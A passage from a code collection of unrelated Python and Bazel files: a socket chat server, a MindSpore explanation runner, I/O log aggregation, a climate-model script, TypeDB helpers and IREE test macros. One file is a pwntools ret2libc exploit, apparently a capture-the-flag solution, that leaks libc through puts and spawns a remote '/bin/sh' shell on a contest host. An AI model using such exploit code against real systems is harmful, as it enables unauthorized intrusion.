except KeyError:
pass
client_socket.close()
def handler(self, client_socket, address):
while True:
try:
data = streamData(client_socket)
except ConnectionResetError:
print(f"*** [{address[0]}] unexpectedly closed the connetion, received only an RST packet.")
self.closeConnection(client_socket, address)
break
if not data:
print(f"*** [{address[0]}] disconnected")
self.closeConnection(client_socket, address)
break
if data["typ"] == 'setuser':
self.checkUsername(client_socket, address, data)
if self.temp_f == True:
continue
else:
if data["cont"] != '':
if data["typ"] == 'default':
self.logChat(data["cont"])
self.current(data["cont"])
else:
self.logChat(data["cont"])
if data["typ"] == 'export':
print("*** Sending chat...")
self.exportChat(client_socket, address)
elif data["typ"] == 'help':
print("*** Sending command list...")
self.commandList(client_socket)
else:
for connection in self.connections:
if connection != client_socket:
connection.send(createMsg(json.dumps(data)).encode("utf-8"))
def getArgs():
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--port", dest = "port", help = "Start server on port X")
options = parser.parse_args()
if not options.port:
raise Exception
else:
return options
def main():
try:
options = getArgs()
PORT = int(options.port)
except Exception: # if the user doesn't parse values from the command line
PORT = int(input("*** Start server on port > "))
HOSTNAME = socket.gethostname()
IP = socket.gethostbyname(HOSTNAME)
BUFFER_SIZE = 1024
server = Server(IP, PORT, BUFFER_SIZE)
try:
server.startServer()
server.acceptConnections()
except Exception as e:
print("General error", str(e))
if __name__ == "__main__":
main()
|
the-stack_106_22089
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Runner."""
from time import time
from typing import Tuple, List, Optional
import numpy as np
from mindspore.train.summary_pb2 import Explain
import mindspore as ms
import mindspore.dataset as ds
from mindspore import log
from mindspore.ops.operations import ExpandDims
from mindspore.train.summary._summary_adapter import _convert_image_format, _make_image
from mindspore.train.summary.summary_record import SummaryRecord
from .benchmark import Localization
from .benchmark._attribution.metric import AttributionMetric
from .explanation._attribution._attribution import Attribution
_EXPAND_DIMS = ExpandDims()
_CMAP_0 = np.reshape(np.array([55, 25, 86, 255]), [1, 1, 4]) / 255
_CMAP_1 = np.reshape(np.array([255, 255, 0, 255]), [1, 1, 4]) / 255
def _normalize(img_np):
"""Normalize the image in the numpy array to be in [0, 255]. """
max_ = img_np.max()
min_ = img_np.min()
normed = (img_np - min_) / (max_ - min_).clip(min=1e-10)
return (normed * 255).astype(np.uint8)
def _make_rgba(saliency):
"""Make rgba image for saliency map."""
saliency = saliency.asnumpy().squeeze()
saliency = (saliency - saliency.min()) / (saliency.max() - saliency.min()).clip(1e-10)
rgba = np.empty((saliency.shape[0], saliency.shape[1], 4))
rgba[:, :, :] = np.expand_dims(saliency, 2)
rgba = rgba * _CMAP_1 + (1 - rgba) * _CMAP_0
rgba[:, :, -1] = saliency * 1
return rgba
class ExplainRunner:
"""
High-level API for users to generate results with the explanation methods and the evaluation methods.
After generating results with the explanation methods and the evaluation methods, the results will be written into
a specified file with 'mindspore.summary.SummaryRecord'. The stored content can be viewed using MindInsight.
Args:
summary_dir (str): The directory path to save the summary files which store the generated results.
Default: "./"
Examples:
>>> # init a runner with a specified directory
>>> summary_dir = "summary_dir"
>>> runner = ExplainRunner(summary_dir)
"""
def __init__(self, summary_dir: Optional[str] = "./"):
self._summary_dir = summary_dir
self._count = 0
self._classes = None
self._model = None
def run(self,
dataset: Tuple,
explainers: List,
benchmarkers: Optional[List] = None):
"""
Genereate results and write results into the summary files in `self.summary_dir`.
Args:
dataset (tuple): A tuple that contains `mindspore.dataset` object for iteration and its labels.
- dataset[0], a `mindspore.dataset` object to provide data to explain.
- dataset[1], a list of string that specifies the label names of the dataset.
explainers (list): A list of explanation objects to generate _attribution results.
benchmarkers (list): A list of benchmark objects to generate evaluation results. Default: None
Examples:
>>> from mindspore.explainer.explanation import GuidedBackprop, Gradient
>>> # obtain dataset object
>>> dataset = get_dataset()
>>> classes = ["cat", "dog", ...]
>>> # load checkpoint to a network, e.g. resnet50
>>> param_dict = load_checkpoint("checkpoint.ckpt")
>>> net = resnet50(len(classes))
>>> load_parama_into_net(net, param_dict)
>>> # bind net with its output activation
>>> model = nn.SequentialCell([net, nn.Sigmoid()])
>>> gbp = GuidedBackprop(model)
>>> gradient = Gradient(model)
>>> runner = ExplainRunner("./")
>>> explainers = [gbp, gradient]
>>> runner.run((dataset, classes), explainers)
"""
if not isinstance(dataset, tuple):
raise TypeError("Argument `dataset` must be a tuple.")
if len(dataset) != 2:
raise ValueError("Argument `dataset` should be a tuple with length = 2.")
dataset, classes = dataset
self._verify_data_form(dataset, benchmarkers)
self._classes = classes
if explainers is None or not explainers:
raise ValueError("Argument `explainers` can neither be None nor empty.")
for exp in explainers:
if not isinstance(exp, Attribution) or not isinstance(explainers, list):
raise TypeError("Argument explainers should be a list of objects of classes in "
"`mindspore.explainer.explanation._attribution`.")
if benchmarkers is not None:
for bench in benchmarkers:
if not isinstance(bench, AttributionMetric) or not isinstance(explainers, list):
raise TypeError("Argument benchmarkers should be a list of objects of classes in explanation"
"`mindspore.explainer.benchmark._attribution`.")
self._model = explainers[0].model
with SummaryRecord(self._summary_dir) as summary:
print("Start running and writing......")
begin = time()
print("Start writing metadata.")
explain = Explain()
explain.metadata.label.extend(classes)
exp_names = [exp.__class__.__name__ for exp in explainers]
explain.metadata.explain_method.extend(exp_names)
if benchmarkers is not None:
bench_names = [bench.__class__.__name__ for bench in benchmarkers]
explain.metadata.benchmark_method.extend(bench_names)
summary.add_value("explainer", "metadata", explain)
summary.record(1)
print("Finish writing metadata.")
now = time()
print("Start running and writing inference data......")
imageid_labels = self._run_inference(dataset, summary)
print("Finish running and writing inference data. Time elapsed: {}s".format(time() - now))
if benchmarkers is None:
for exp in explainers:
start = time()
print("Start running and writing explanation data for {}......".format(exp.__class__.__name__))
self._count = 0
ds.config.set_seed(58)
for idx, next_element in enumerate(dataset):
now = time()
self._run_exp_step(next_element, exp, imageid_labels, summary)
print("Finish writing {}-th explanation data. Time elapsed: {}".format(
idx, time() - now))
print("Finish running and writing explanation data for {}. Time elapsed: {}".format(
exp.__class__.__name__, time() - start))
else:
for exp in explainers:
explain = Explain()
for bench in benchmarkers:
bench.reset()
print(f"Start running and writing explanation and benchmark data for {exp.__class__.__name__}.")
self._count = 0
start = time()
ds.config.set_seed(58)
for idx, next_element in enumerate(dataset):
now = time()
saliency_dict_lst = self._run_exp_step(next_element, exp, imageid_labels, summary)
print("Finish writing {}-th batch explanation data. Time elapsed: {}s".format(
idx, time() - now))
for bench in benchmarkers:
now = time()
self._run_exp_benchmark_step(next_element, exp, bench, saliency_dict_lst)
print("Finish running {}-th batch benchmark data for {}. Time elapsed: {}s".format(
idx, bench.__class__.__name__, time() - now))
for bench in benchmarkers:
benchmark = explain.benchmark.add()
benchmark.explain_method = exp.__class__.__name__
benchmark.benchmark_method = bench.__class__.__name__
benchmark.total_score = bench.performance
benchmark.label_score.extend(bench.class_performances)
print("Finish running and writing explanation and benchmark data for {}. "
"Time elapsed: {}s".format(exp.__class__.__name__, time() - start))
summary.add_value('explainer', 'benchmark', explain)
summary.record(1)
print("Finish running and writing. Total time elapsed: {}s".format(time() - begin))
@staticmethod
def _verify_data_form(dataset, benchmarkers):
"""
Verify the validity of dataset.
Args:
dataset (`ds`): the user parsed dataset.
benchmarkers (list[`AttributionMetric`]): the user parsed benchmarkers.
"""
next_element = dataset.create_tuple_iterator().get_next()
if len(next_element) not in [1, 2, 3]:
raise ValueError("The dataset should provide [images] or [images, labels], [images, labels, bboxes]"
" as columns.")
if len(next_element) == 3:
inputs, labels, bboxes = next_element
if bboxes.shape[-1] != 4:
raise ValueError("The third element of dataset should be bounding boxes with shape of "
"[batch_size, num_ground_truth, 4].")
else:
if True in [isinstance(bench, Localization) for bench in benchmarkers]:
raise ValueError("The dataset must provide bboxes if Localization is to be computed.")
if len(next_element) == 2:
inputs, labels = next_element
if len(next_element) == 1:
inputs = next_element[0]
if len(inputs.shape) > 4 or len(inputs.shape) < 3 or inputs.shape[-3] not in [1, 3, 4]:
raise ValueError(
"Image shape {} is unrecognizable: the dimension of image can only be CHW or NCHW.".format(
inputs.shape))
if len(inputs.shape) == 3:
log.warning(
"Image shape {} is 3-dimensional. All the data will be automatically unsqueezed at the 0-th"
" dimension as batch data.".format(inputs.shape))
if len(next_element) > 1:
if len(labels.shape) > 2 and (np.array(labels.shape[1:]) > 1).sum() > 1:
raise ValueError(
"Labels shape {} is unrecognizable: labels should not have more than two dimensions"
" with length greater than 1.".format(labels.shape))
def _transform_data(self, inputs, labels, bboxes, ifbbox):
"""
Transform the data from one iteration of dataset to a unifying form for the follow-up operations.
Args:
inputs (Tensor): the image data
labels (Tensor): the labels
bboxes (Tensor): the boudnding boxes data
ifbbox (bool): whether to preprocess bboxes. If True, a dictionary that indicates bounding boxes w.r.t label
id will be returned. If False, the returned bboxes is the the parsed bboxes.
Returns:
inputs (Tensor): the image data, unified to a 4D Tensor.
labels (List[List[int]]): the ground truth labels.
bboxes (Union[List[Dict], None, Tensor]): the bounding boxes
"""
inputs = ms.Tensor(inputs, ms.float32)
if len(inputs.shape) == 3:
inputs = _EXPAND_DIMS(inputs, 0)
if isinstance(labels, ms.Tensor):
labels = ms.Tensor(labels, ms.int32)
labels = _EXPAND_DIMS(labels, 0)
if isinstance(bboxes, ms.Tensor):
bboxes = ms.Tensor(bboxes, ms.int32)
bboxes = _EXPAND_DIMS(bboxes, 0)
input_len = len(inputs)
if bboxes is not None and ifbbox:
bboxes = ms.Tensor(bboxes, ms.int32)
masks_lst = []
labels = labels.asnumpy().reshape([input_len, -1])
bboxes = bboxes.asnumpy().reshape([input_len, -1, 4])
for idx, label in enumerate(labels):
height, width = inputs[idx].shape[-2], inputs[idx].shape[-1]
masks = {}
for j, label_item in enumerate(label):
target = int(label_item)
if -1 < target < len(self._classes):
if target not in masks:
mask = np.zeros((1, 1, height, width))
else:
mask = masks[target]
x_min, y_min, x_len, y_len = bboxes[idx][j].astype(int)
mask[:, :, x_min:x_min + x_len, y_min:y_min + y_len] = 1
masks[target] = mask
masks_lst.append(masks)
bboxes = masks_lst
labels = ms.Tensor(labels, ms.int32)
if len(labels.shape) == 1:
labels_lst = [[int(i)] for i in labels.asnumpy()]
else:
labels = labels.asnumpy().reshape([input_len, -1])
labels_lst = []
for item in labels:
labels_lst.append(list(set(int(i) for i in item if -1 < int(i) < len(self._classes))))
labels = labels_lst
return inputs, labels, bboxes
def _unpack_next_element(self, next_element, ifbbox=False):
"""
Unpack a single iteration of dataset.
Args:
next_element (Tuple): a single element iterated from dataset object.
ifbbox (bool): whether to preprocess bboxes in self._transform_data.
Returns:
Tuple, a unified Tuple contains image_data, labels, and bounding boxes.
"""
if len(next_element) == 3:
inputs, labels, bboxes = next_element
elif len(next_element) == 2:
inputs, labels = next_element
bboxes = None
else:
inputs = next_element[0]
labels = [[] for x in inputs]
bboxes = None
inputs, labels, bboxes = self._transform_data(inputs, labels, bboxes, ifbbox)
return inputs, labels, bboxes
@staticmethod
def _make_label_batch(labels):
"""
Unify a List of List of labels to be a 2D Tensor with shape (b, m), where b = len(labels) and m is the max
length of all the rows in labels.
Args:
labels (List[List]): the union labels of a data batch.
Returns:
2D Tensor.
"""
max_len = max([len(l) for l in labels])
batch_labels = np.zeros((len(labels), max_len))
for idx, _ in enumerate(batch_labels):
length = len(labels[idx])
batch_labels[idx, :length] = np.array(labels[idx])
return ms.Tensor(batch_labels, ms.int32)
def _run_inference(self, dataset, summary, threshod=0.5):
"""
Run inference for the dataset and write the inference related data into summary.
Args:
dataset (`ds`): the parsed dataset
summary (`SummaryRecord`): the summary object to store the data
threshold (float): the threshold for prediction.
Returns:
imageid_labels (dict): a dict that maps image_id and the union of its ground truth and predicted labels.
"""
imageid_labels = {}
ds.config.set_seed(58)
self._count = 0
for j, next_element in enumerate(dataset):
now = time()
inputs, labels, _ = self._unpack_next_element(next_element)
prob = self._model(inputs).asnumpy()
for idx, inp in enumerate(inputs):
gt_labels = labels[idx]
gt_probs = [float(prob[idx][i]) for i in gt_labels]
data_np = _convert_image_format(np.expand_dims(inp.asnumpy(), 0), 'NCHW')
_, _, _, image_string = _make_image(_normalize(data_np))
predicted_labels = [int(i) for i in (prob[idx] > threshod).nonzero()[0]]
predicted_probs = [float(prob[idx][i]) for i in predicted_labels]
union_labs = list(set(gt_labels + predicted_labels))
imageid_labels[str(self._count)] = union_labs
explain = Explain()
explain.image_id = str(self._count)
explain.image_data = image_string
summary.add_value("explainer", "image", explain)
explain = Explain()
explain.image_id = str(self._count)
explain.ground_truth_label.extend(gt_labels)
explain.inference.ground_truth_prob.extend(gt_probs)
explain.inference.predicted_label.extend(predicted_labels)
explain.inference.predicted_prob.extend(predicted_probs)
summary.add_value("explainer", "inference", explain)
summary.record(1)
self._count += 1
print("Finish running and writing {}-th batch inference data. Time elapsed: {}s".format(j, time() - now))
return imageid_labels
def _run_exp_step(self, next_element, explainer, imageid_labels, summary):
"""
Run the explanation for each step and write explanation results into summary.
Args:
next_element (Tuple): data of one step
explainer (_Attribution): an Attribution object to generate saliency maps.
imageid_labels (dict): a dict that maps the image_id and its union labels.
summary (SummaryRecord): the summary object to store the data
Returns:
List of dict that maps label to its corresponding saliency map.
"""
inputs, labels, _ = self._unpack_next_element(next_element)
count = self._count
unions = []
for _ in range(len(labels)):
unions_labels = imageid_labels[str(count)]
unions.append(unions_labels)
count += 1
batch_unions = self._make_label_batch(unions)
saliency_dict_lst = []
batch_saliency_full = []
for i in range(len(batch_unions[0])):
batch_saliency = explainer(inputs, batch_unions[:, i])
batch_saliency_full.append(batch_saliency)
for idx, union in enumerate(unions):
saliency_dict = {}
explain = Explain()
explain.image_id = str(self._count)
for k, lab in enumerate(union):
saliency = batch_saliency_full[k][idx:idx + 1]
saliency_dict[lab] = saliency
saliency_np = _make_rgba(saliency)
_, _, _, saliency_string = _make_image(_normalize(saliency_np))
explanation = explain.explanation.add()
explanation.explain_method = explainer.__class__.__name__
explanation.label = lab
explanation.heatmap = saliency_string
summary.add_value("explainer", "explanation", explain)
summary.record(1)
self._count += 1
saliency_dict_lst.append(saliency_dict)
return saliency_dict_lst
def _run_exp_benchmark_step(self, next_element, explainer, benchmarker, saliency_dict_lst):
"""
Run the explanation and evaluation for each step and write explanation results into summary.
Args:
next_element (Tuple): Data of one step
explainer (`_Attribution`): An Attribution object to generate saliency maps.
imageid_labels (dict): A dict that maps the image_id and its union labels.
"""
inputs, labels, _ = self._unpack_next_element(next_element)
for idx, inp in enumerate(inputs):
inp = _EXPAND_DIMS(inp, 0)
saliency_dict = saliency_dict_lst[idx]
for label, saliency in saliency_dict.items():
if isinstance(benchmarker, Localization):
_, _, bboxes = self._unpack_next_element(next_element, True)
if label in labels[idx]:
res = benchmarker.evaluate(explainer, inp, targets=label, mask=bboxes[idx][label],
saliency=saliency)
benchmarker.aggregate(res, label)
else:
res = benchmarker.evaluate(explainer, inp, targets=label, saliency=saliency)
benchmarker.aggregate(res, label)
|
the-stack_106_22090
|
import csv
import numpy as np
import sys
import os
from pathlib import Path
from argparse import ArgumentParser
inputBytes = sys.argv[1]
outputBytes = sys.argv[2]
stagesOutputBytes = sys.argv[3]
replicationFactor = sys.argv[4]
outputFile = sys.argv[5]
appNameIndex = 0
nodeNameIndex = 1
executorIdIndex = 2
executorTotalReadKbIndex = 3
executorTotalWriteKbIndex = 4
HdfsTotalReadKbIndex = 5
HdfsTotalWriteKbIndex = 6
class Executor:
def __init__(self, appName):
self.appName = appName
self.nodeName = ""
self.executorId = 0
self.executorTotalReadKb = 0
self.executorTotalWriteKb = 0
self.HdfsTotalReadKb = 0
self.HdfsTotalWriteKb = 0
def __repr__(self):
return f"""
Executor: {self.executorId},
totalReadKb: {self.totalReadKb()}
totalWriteKb: {self.totalWriteKb()}
totalReadAndWriteKb: {self.totalReadAndWriteKb()}
"""
def totalReadKb(self):
return self.executorTotalReadKb + self.HdfsTotalReadKb
def totalWriteKb(self):
return self.executorTotalWriteKb + self.HdfsTotalWriteKb
def totalReadAndWriteKb(self):
return self.totalReadKb() + self.totalWriteKb()
class IoActivityExperiment:
def __init__(self, appName):
self.appName = appName
self.executors = []
def __repr__(self):
return f"""
IoActivityExperiment: {self.appName},
Number of Executors: {len(self.executors)}
totalReadKb: {self.totalReadKb()}
totalWriteKb: {self.totalWriteKb()}
totalReadAndWriteKb: {self.totalReadAndWriteKb()}
"""
def totalReadKb(self):
return sum([item.totalReadKb() for item in self.executors])
def totalWriteKb(self):
return sum([item.totalWriteKb() for item in self.executors])
def totalReadAndWriteKb(self):
return sum([item.totalReadAndWriteKb() for item in self.executors])
executors = []
header = []
experiment = [];
def getExecutorResultFromLine (input):
if input.startswith("appName"):
return;
# rstrip() because of the trailing new line. (e.g., "\n")
input = input.rstrip().split(",")
global experiment;
print(input)
print(input[executorTotalReadKbIndex])
if experiment == None:
experiment = IoActivityExperiment(input[appNameIndex])
executor = Executor(f"{input[appNameIndex]}")
executor.executorId = int(input[executorIdIndex])
executor.nodeName = input[nodeNameIndex]
executor.executorTotalReadKb= int(input[executorTotalReadKbIndex])
executor.executorTotalWriteKb = int(input[executorTotalWriteKbIndex])
executor.HdfsTotalReadKb = int(input[HdfsTotalReadKbIndex])
executor.HdfsTotalWriteKb = int(input[HdfsTotalWriteKbIndex])
print(executor)
experiment.executors.append(executor)
def writeToOutput(experiment):
# {Path.home()}/results/io-activity/outputPio.csv
fileName = outputFile
file_exists = os.path.isfile(fileName)
with open(fileName, mode='a') as output_file:
headers = ['appName', 'totalReadKb', 'totalWriteKb', 'totalReadAndWriteKb', 'inputBytes', 'outputBytes',
'stagesOutputBytes','replicationFactor']
writer = csv.writer(output_file, delimiter=',')
if not file_exists:
writer.writerow(headers) # file doesn't exist yet, write a header
row = [experiment.appName, experiment.totalReadKb(), experiment.totalWriteKb(),
experiment.totalReadAndWriteKb(), inputBytes, outputBytes, stagesOutputBytes, replicationFactor]
writer.writerow(row)
experiment = None;
for line in sys.stdin:
getExecutorResultFromLine(line)
print(experiment)
writeToOutput(experiment)
|
the-stack_106_22093
|
#!/usr/bin/python3
from pwn import *
binary = ELF('./hello')
context.update(arch='i386',os='linux')
#p = process(binary.path)
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
p = remote('chall.csivit.com', 30046)
libc = ELF('libc-database/db/libc6-i386_2.23-0ubuntu11.2_amd64.so')
payload = 0x88 * b'A'
payload += p32(binary.plt.puts)
payload += p32(binary.sym.main)
payload += p32(binary.got.puts)
p.sendlineafter('name?\n', payload)
p.recvuntil('!\n')
_ = p.recv(4)
puts = u32(_ + (4-len(_))*b'\x00')
log.info('puts: ' + hex(puts))
baselibc = puts - libc.sym.puts
log.info('baselibc: ' + hex(baselibc))
libc.address = baselibc
payload = 0x88 * b'A'
payload += p32(libc.sym.execve)
payload += 4 * b'B'
payload += p32(libc.search(b'/bin/sh').__next__())
payload += p32(libc.sym.environ)
payload += p32(libc.sym.environ)
p.sendlineafter('name?\n', payload)
p.recvuntil('!')
p.interactive()
|
the-stack_106_22095
|
import climt
from sympl import PlotFunctionMonitor
import numpy as np
import matplotlib.pyplot as plt
from datetime import timedelta
def plot_function(fig, state):
fig.set_size_inches(10, 5)
ax = fig.add_subplot(1, 2, 1)
state['air_temperature'].mean(dim='lon').plot.contourf(
ax=ax, levels=16)
ax.set_title('Temperature')
ax = fig.add_subplot(1, 2, 2)
state['eastward_wind'].mean(dim='lon').plot.contourf(
ax=ax, levels=16)
ax.set_title('Zonal Wind')
plt.suptitle('Time: '+str(state['time']))
model_time_step = timedelta(seconds=600)
monitor = PlotFunctionMonitor(plot_function)
grid = climt.get_grid(nx=128, ny=62)
held_suarez = climt.HeldSuarez()
dycore = climt.GFSDynamicalCore([held_suarez])
my_state = climt.get_default_state([dycore], grid_state=grid)
my_state['eastward_wind'].values[:] = np.random.randn(*my_state['eastward_wind'].shape)
for i in range(10000):
diag, output = dycore(my_state, model_time_step)
if (my_state['time'].hour % 2 == 0 and
my_state['time'].minute == 0):
print('max. zonal wind: ', np.amax(my_state['eastward_wind'].values))
monitor.store(my_state)
my_state.update(output)
my_state['time'] += model_time_step
|
the-stack_106_22096
|
#
# Copyright (C) 2021 Vaticle
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
def get_thing_types(tx):
"""
Get all schema types, excluding those for implicit attribute relations and base types
Args:
tx: TypeDB transaction
Returns:
TypeDB types
"""
schema_concepts = tx.query().match("match $x sub thing;")
thing_types = [schema_concept.get('x').get_label().name() for schema_concept in schema_concepts]
[thing_types.remove(el) for el in ['thing', 'relation', 'entity', 'attribute']]
return thing_types
def get_role_types(tx):
"""
Get all schema roles, excluding those for implicit attribute relations, the base role type
Args:
tx: TypeDB transaction
Returns:
TypeDB roles
"""
schema_concepts = tx.query().match("match $rel sub relation, relates $r;")
role_types = ['has'] + [role.get('r').get_label().name() for role in schema_concepts]
role_types.remove('role')
return role_types
|
the-stack_106_22099
|
# Copyright 2020 The IREE Authors
#
# Licensed under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
"""Macros for defining tests that run a module using iree-check-module."""
load("//iree/tools:compilation.bzl", "iree_bytecode_module")
load("//build_tools/bazel:run_binary_test.bzl", "run_binary_test")
ALL_TARGET_BACKENDS_AND_DRIVERS = [
("vmvx", "vmvx"),
("vulkan-spirv", "vulkan"),
("dylib-llvm-aot", "dylib"),
]
def iree_check_test(
name,
src,
target_backend,
driver,
compiler_flags = [],
runner_args = [],
tags = [],
timeout = None,
**kwargs):
"""Creates an iree-check-module test for the specified source file.
Args:
name: name of the generated test.
src: source mlir file containing the module.
target_backend: target backend to compile for.
driver: driver to run the module with.
compiler_flags: additional flags to pass to the compiler. Bytecode translation and backend
flags are passed automatically.
runner_args: additional runner_args to pass to iree-check-module. The driver and input file
are passed automatically.
tags: additional tags to apply to the generated test. A tag "driver=DRIVER" is added
automatically.
timeout: timeout for the generated tests.
**kwargs: any additional attributes to pass to the underlying run_binary_test.
"""
bytecode_module_name = name + "_bytecode_module"
iree_bytecode_module(
name = bytecode_module_name,
src = src,
flags = [
"-iree-mlir-to-vm-bytecode-module",
"-mlir-print-op-on-diagnostic=false",
"-iree-hal-target-backends=%s" % target_backend,
] + compiler_flags,
visibility = ["//visibility:private"],
)
run_binary_test(
name = name,
args = [
"--driver=%s" % driver,
"$(location :%s)" % bytecode_module_name,
] + runner_args,
data = [":%s" % bytecode_module_name],
test_binary = "//iree/tools:iree-check-module",
tags = tags + ["driver=%s" % driver],
timeout = timeout,
**kwargs
)
def iree_check_single_backend_test_suite(
name,
srcs,
target_backend,
driver,
compiler_flags = [],
runner_args = [],
tags = [],
timeout = None,
**kwargs):
"""Creates a test suite of iree-check-module tests for a single backend/driver pair.
One test is generated per source file.
Args:
name: name of the generated test suite.
srcs: source mlir files containing the module.
target_backend: target backend to compile for.
driver: driver to run the module with.
compiler_flags: additional flags to pass to the compiler. Bytecode translation and backend
flags are passed automatically.
runner_args: additional runner_args to pass to the underlying iree-check-module tests. The
driver and input file are passed automatically. To use different runner_args per test,
create a separate suite or iree_check_test.
tags: tags to apply to the generated tests. Note that as in standard test suites, manual
is treated specially and will also apply to the test suite itself.
timeout: timeout for the generated tests.
**kwargs: any additional attributes to pass to the underlying tests and test suite.
"""
tests = []
for src in srcs:
test_name = "_".join([name, src])
iree_check_test(
name = test_name,
src = src,
target_backend = target_backend,
driver = driver,
compiler_flags = compiler_flags,
runner_args = runner_args,
tags = tags,
timeout = timeout,
**kwargs
)
tests.append(test_name)
native.test_suite(
name = name,
tests = tests,
# Note that only the manual tag really has any effect here. Others are
# used for test suite filtering, but all tests are passed the same tags.
tags = tags,
# If there are kwargs that need to be passed here which only apply to
# the generated tests and not to test_suite, they should be extracted
# into separate named arguments.
**kwargs
)
def iree_check_test_suite(
name,
srcs,
target_backends_and_drivers = ALL_TARGET_BACKENDS_AND_DRIVERS,
compiler_flags = [],
runner_args = [],
tags = [],
**kwargs):
"""Creates a test suite of iree-check-module tests.
One test is generated per source file and backend/driver.
Args:
name: name of the generated test suite.
srcs: source mlir files containing the module.
target_backends_and_drivers: backend/driver pairs to compile and run the module, respectively.
compiler_flags: additional flags to pass to the compiler. Bytecode translation and backend
flags are passed automatically.
runner_args: additional runner_args to pass to the underlying iree-check-module tests. The
driver and input file are passed automatically. To use different runner_args per test,
create a separate suite or iree_check_test.
tags: tags to apply to the generated tests. Note that as in standard test suites, manual
is treated specially and will also apply to the test suite itself.
**kwargs: any additional attributes to pass to the underlying tests and test suite.
"""
# We could have complicated argument override logic for runner_args and such, or... the client
# could just create a test suite. The latter seems simpler and more readable.
tests = []
for backend, driver in target_backends_and_drivers:
suite_name = "_".join([name, backend, driver])
iree_check_single_backend_test_suite(
name = suite_name,
srcs = srcs,
driver = driver,
target_backend = backend,
compiler_flags = compiler_flags,
runner_args = runner_args,
tags = tags,
**kwargs
)
tests.append(suite_name)
native.test_suite(
name = name,
tests = tests,
# Note that only the manual tag really has any effect here. Others are
# used for test suite filtering, but all tests are passed the same tags.
tags = tags,
# If there are kwargs that need to be passed here which only apply to
# the generated tests and not to test_suite, they should be extracted
# into separate named arguments.
**kwargs
)
|
the-stack_106_22100
|
import json
import sys
from os.path import abspath
def join_jsons(fin_path1, fin_fpath2, fout_path, with_dup = False):
final = list()
with open(fin_path1, 'r', encoding="utf8") as f:
final = json.load(f)
print(f"First JSONL contains {len(final)} rows")
tmp = list()
with open(fin_fpath2, 'r', encoding="utf8") as f:
tmp = json.load(f)
print(f"Second JSONL contains {len(tmp)} rows")
final.extend(tmp)
if not with_duplicates:
final = [dict(tupleized) for tupleized in set(tuple(item.items()) for item in final)]
with open(fout_path, 'w', encoding="utf8") as f:
json.dump(final, f)
print(f"Final JSONL contains {len(final)} rows and has been created in {abspath(fout_path)}")
def print_usage():
print("Usage:\n\tpython join_json.py in_json1 in_json2 out_json [ -d | --dup ]")
if __name__ == "__main__":
with_duplicates = False
if len(sys.argv) < 4:
print_usage()
exit(10)
if len(sys.argv) == 5:
if sys.argv[4] == "-d" or sys.argv[4] == '--dup':
with_duplicates = True
else:
print_usage()
exit(10)
fin_path1 = sys.argv[1]
fin_path2 = sys.argv[2]
fout_path = sys.argv[3]
join_jsons(fin_path1, fin_path2, fout_path, with_duplicates)
|
the-stack_106_22102
|
"""
A batch prcoessing that calls main_lc.py with the same set of parameters
but different split ids.
"""
import warnings
warnings.filterwarnings('ignore')
import os
import sys
from pathlib import Path
import argparse
from glob import glob
import numpy as np
# from joblib import Parallel, delayed
fdir = Path(__file__).resolve().parent
import main_lc
def run_split_fly(n_splits, rout, *args):
""" Generate split on the fly. """
print('Calling run_split_fly ...')
main_lc.main([ '--n_splits', str(n_splits), '--rout', 'run_'+str(rout), *args ])
parser = argparse.ArgumentParser()
parser.add_argument('-ns', '--n_splits',
default=10,
type=int,
help='Use a subset of splits (default: 10).')
args, other_args = parser.parse_known_args()
print(args)
main_fn = run_split_fly
splits_arr = [1 for _ in range(args.n_splits)]
runs_arr = np.arange(args.n_splits)
n_splits = args.n_splits
# Main execution
for s, r in zip( splits_arr[:n_splits], runs_arr[:n_splits] ):
print(f'Processing split {s}')
other_args_run = other_args.copy()
main_fn(s, r, *other_args_run) # only one split for every run
print('Done.')
|
the-stack_106_22103
|
from __future__ import division, absolute_import, print_function
from .. import affinitymat
from .. import nearest_neighbors
from .. import cluster
from .. import aggregator
from .. import core
from .. import util
from .. import seqlet_embedding
from .. import pattern_filterer as pattern_filterer_module
from joblib import Parallel, delayed
from collections import defaultdict, OrderedDict, Counter
import numpy as np
import time
import sys
import gc
import json
from ..util import print_memory_use
def get_seqlet_neighbors_with_initcluster(
nearest_neighbors_to_compute,
coarse_affmat, initclusters):
if (initclusters is not None):
assert len(initclusters)==len(coarse_affmat)
#get the argsort for coarse_affmat
coarse_affmat_argsort = np.argsort(-coarse_affmat, axis=-1)
nearest_neighbors = []
for row_idx,argsort_row in enumerate(coarse_affmat_argsort):
combined_neighbor_row = []
neighbor_row_topnn = argsort_row[:nearest_neighbors_to_compute+1]
neighbor_set_topnn = set(neighbor_row_topnn)
#combined_neighbor_row ends up being the union of the standard nearest
# neighbors plus the nearest neighbors if focusing on the initclusters
combined_neighbor_row.extend(neighbor_row_topnn)
if (initclusters is not None):
combined_neighbor_row.extend([
y for y in ([x for x in argsort_row
if initclusters[x]==initclusters[row_idx]][
:nearest_neighbors_to_compute+1])
if y not in neighbor_set_topnn])
nearest_neighbors.append(combined_neighbor_row)
return nearest_neighbors
def fish_out_kwargs(orig_kwargs, to_fish_out):
fished_out = {}
for kwarg_name in to_fish_out:
if kwarg_name in orig_kwargs:
fished_out[kwarg_name] = orig_kwargs[kwarg_name]
del orig_kwargs[kwarg_name]
return fished_out
#adds backwargs compatibility re gapped kmer arguments
def legacy_tfmodiscoseqletstopatternsfactory(current_constructor):
